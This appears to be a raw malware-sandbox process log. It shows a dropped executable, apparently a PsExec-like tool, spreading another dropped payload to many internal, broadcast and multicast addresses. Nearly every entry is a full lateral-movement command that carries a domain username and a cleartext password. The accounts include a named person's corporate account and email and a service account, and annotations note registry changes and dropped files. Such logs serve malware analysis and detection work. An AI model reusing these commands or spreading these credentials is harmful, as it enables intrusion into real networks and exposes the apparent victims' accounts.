    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\igmp.mcast.net -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.22 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
    - Modifies data under HKEY_USERS

[3] C:\Windows\TEMP\_fif.exe
    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\255.255.255.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\Ewycradz -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\_fif.exeC:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"3⤵
-
      [4] C:\Windows\System32\Conhost.exe
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Drops file in Windows directory
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Drops file in Windows directory
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Drops file in Windows directory

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Drops file in Windows directory

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.67 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
      - Modifies data under HKEY_USERS

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.71 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\10.10.0.1 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

    [3] C:\Windows\TEMP\_fif.exe
      C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"

